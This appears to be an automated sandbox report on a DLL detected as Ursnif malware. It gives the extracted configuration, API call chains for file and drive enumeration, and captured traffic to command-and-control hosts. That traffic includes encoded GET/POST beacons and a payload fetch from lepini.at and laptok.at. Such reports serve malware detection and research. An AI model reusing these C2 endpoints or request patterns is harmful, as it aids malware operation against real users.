Analysis Report Ne6A4k8vK6.dll

AV Detection:

Found malware configuration

Source: regsvr32.exe.6708.1.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "156", "system": "1c5e3cccb7efbfdcae35102f01307909hh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453310", "user": "f73be0088695dc15e71ab15cc8e7488a", "hash": "0xf857f57e", "soft": "3"}

Multi AV Scanner detection for submitted file

Source: Ne6A4k8vK6.dll

Virustotal: Detection: 13%

Perma Link

Compliance:

Uses 32bit PE files

Source: Ne6A4k8vK6.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49747 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.411859001.000002A2AAE80000.00000002.00000001.sdmp, csc.exe, 00000027.00000002.420747019.00000269E51E0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.415909336.0000000005BD0000.00000004.00000001.sdmp
Source:	Binary string: c:\Pieceespecially\watchPeriod\farmShine\Sing.pdb source: Ne6A4k8vK6.dll
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.415909336.0000000005BD0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000026.00000002.467494612.000001A5E2DCC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.467494612.000001A5E2DCC000.00000004.00000040.sdmp

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		1_2_008F3512
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FB88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,		1_2_042FB88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F4CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,		1_2_042F4CF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04305518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,		1_2_04305518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		1_2_042F834C

Contains functionality to query local drives

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_042F16E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

1_2_042F16E1

Networking:

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.20.184.68 104.20.184.68

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /api1/nH23HHDrgk/10Cw7k0sEsFdP7SDZ/GJzI8RwZt_2F/lJSbcpCS9kd/So9_2FRP7wVauo/K_2FZsHvY_2BQo_2B8KvW/kveNSQqUDIB8KWkD/_2BFdRg0RIG_2BM/KBDjblq5CBzqopMAX_/2BiqcvBwe/7091jLT4LvMbkLNdIBL_/2FJrqtJSJIzTB5wtJ4U/pKouwXKTg9H_2FU5iFL7fr/G5kdpSuG0DFl4/78sStOBq/1KCwgfl2cve2_2B91ieBA_2/BG_2BoI5kj/vpZCVzwwZvJx0j7Ia/gE7Fru2i7y88/pRsD_2Fy5JZ/pq9kw97v_2BgUx/yAzHUV1dSPgWD6UrhGUax/xyL8sVq_2BL2eSk/cu1E HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/gtYC_2BK_2FjCAsja/Qyq2AzjFZWki/EyFB_2F9syK/YEZOamZx4Lsvyb/NcUbBRiZnrBjBYyMQ6_2F/wKkcR85o4YpV1aiF/bH4gnTGDFJUIMEM/mE561SA0pEAEX_2Bym/efdVnFq7t/Uwc_2FyPO9MzSPJ4_2BU/t81Od1UbJHPetnRHsOT/rqXpHd7rYb4we6DkYU8imU/_2FSOVXLJM_2F/q6lazIta/_2F2_2BRQRLToH8swdYpdCX/22UvKXxbXV/jGu2E55VFqiwaQRp_/2BPcB4S_2F_2/BSRTbomcVfZ/RJtYgUcyfI1_2F/UArwf2CGHs_2B7xiuzpXf/hgcLVbPoq_2FekGC/m5J0XG9A/7iZlQL_2/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/jzRoxFaC/VGe9D7ZFmtXM2P4WCtXue9i/9UasgR41C7/sUfUr2FPy8aFKQY_2/Bz_2Bn96rDq4/tc7hI4JWi9m/eAoTwSqab6IBJQ/rTwjMGXE3TRb_2FfjUanN/uq7E8yfih5MI9t0m/qpGu2Sq1UQFLURx/pZERC59_2BSrD1zxX_/2FLMHRYnS/Ogu9FB1M7pDsaHxJB5Qy/wnhAaa5h1vW_2FtCzN_/2BnK5hTB5fTJiaqUovmqWy/Ja6s_2BdtmTOE/X8q6_2F2/V3tdgiIR_2BIp0Hf7KFyggN/xa_2BvXTdf/7xkiiYsdPc4BVaNQ5/VezMmr_2BFNF/qenARXrgKUh/s4DIWvPVD/dh9Eh3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/8_2FVgZpGgOpBtPbJtTC/2rMn4UngXKzbuPU6_2F/HMrKuoN_2FrAmSXD_2BLs1/_2BBTwBp4cn7d/E9xMiSRD/EFtTe76YzG6SwcxvsD6t_2B/HIWd_2BnZu/GC7JETGujSFr8ZPF8/xnPVInDfXKwF/NPgQVsTwu8S/fODbYSsgOG1Kvc/kzeOFOJoGwu_2FiqONxDX/ZrCaCgDo8dJu1lDT/GTsLFQvN3R9_2B4/pKgPpYToMQzrl1Jpjk/iH_2FdE98/UAkOcl0pZ1330cRb_2Br/G6mmM7PXa9UEYS394sU/YUU8DGx_2Fbfi2xSZi4oaM/9ScFDx320/O21oW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/wu2u0mamvle7KD3/V6FhzqyfAxIIU2CaAI/qIlRS_2Fx/CthpOK_2Fj8wKLTLfSVs/rYUWFtewT2k11AN4cZS/nADSbEjd5nmtg_2FvKXti7/hC7JJIuUA46Uh/TPa1y6Ss/9sd_2BknTwiuDaVPT_2BJN_/2Bo_2BxpLD/baYT3TeDtFAjqrMrY/4u4jy8DGteXw/aQ07htYAD6p/ExCU5Jl803zQQH/31SKQURjSKCAIf_2FCppg/AgmycwtL1yYvooXF/yeog_2FgLesyEFb/I955KrmqJ1PjWL_2Be/bF8vRaRbN/pHkoU68_2FcveZ9A_2F9/c0dMMHLi/F4if1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at

Found strings which match to known social media urls

Source: de-ch[1].htm.5.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8417ab8b,0x01d70424</date><accdate>0x8417ab8b,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8417ab8b,0x01d70424</date><accdate>0x8417ab8b,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x841ac559,0x01d70424</date><accdate>0x841ac559,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x841ac559,0x01d70424</date><accdate>0x841c014f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x841d8b5c,0x01d70424</date><accdate>0x841d8b5c,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x841d8b5c,0x01d70424</date><accdate>0x841d8b5c,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.5.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.5.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"negativeValue",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.msn.com

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /api1/cAvNUqMpc/IdHHapeYD4SHdVXH3mAd/peW1DdulTWxo4jVdhE_/2BclvubCIZEFeHr2parLsi/W8vAuegF9qm1_/2Bc2Uri2/tI_2B7VBmrQkM_2FGOLWJdV/ZevcOT_2F7/aN1O0bRn0Thy1qYaF/CgfK9alhGqne/Nmw4NXJBDJn/P8aNBBkTqkQ37x/zISm_2BHG3rvuQpW_2B7f/WOCiLUCfbgcmsJTv/KTRHMKqR6xGOuzu/qERS7QC2tez7odTnTc/DN55JCA1v/CVUVwlhUlDcO4fFIy9AC/YGj5TohopLY3Qf8uovP/37r2p6OXxSz6q_2FvuXhXL/nUKFbI3z5dXujOWmh/2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 20:28:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Urls found in memory or binary data

Source: {CBE48857-7017-11EB-90E4-ECF4BB862DED}.dat.3.dr, ~DFF92503A57F2E6FA1.TMP.3.dr	String found in binary or memory: http://api10.laptok.at/api1/gtYC_2BK_2FjCAsja/Qyq2AzjFZWki/EyFB_2F9syK/YEZOamZx4Lsvyb/NcUbBRiZnrBjBY
Source: {CBE48859-7017-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://api10.laptok.at/api1/jzRoxFaC/VGe9D7ZFmtXM2P4WCtXue9i/9UasgR41C7/sUfUr2FPy8aFKQY_2/Bz_2Bn96rD
Source: {CBE48855-7017-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://api10.laptok.at/api1/nH23HHDrgk/10Cw7k0sEsFdP7SDZ/GJzI8RwZt_2F/lJSbcpCS9kd/So9_2FRP7wVauo/K_2
Source: regsvr32.exe, powershell.exe, 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, powershell.exe, 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000021.00000003.429199604.000001F9541B6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000021.00000003.384916588.000001F95436F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsof
Source: regsvr32.exe, 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, regsvr32.exe, 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: de-ch[1].htm.5.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.5.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 00000021.00000002.473644124.000001F93BE0D000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: auction[1].htm.5.dr	String found in binary or memory: http://popup.taboola.com/german
Source: powershell.exe, 00000021.00000002.473361797.000001F93BC01000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ~DFD10CE9AADA4C4DBB.TMP.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000021.00000002.473644124.000001F93BE0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.5.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: ~DFD10CE9AADA4C4DBB.TMP.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DFD10CE9AADA4C4DBB.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
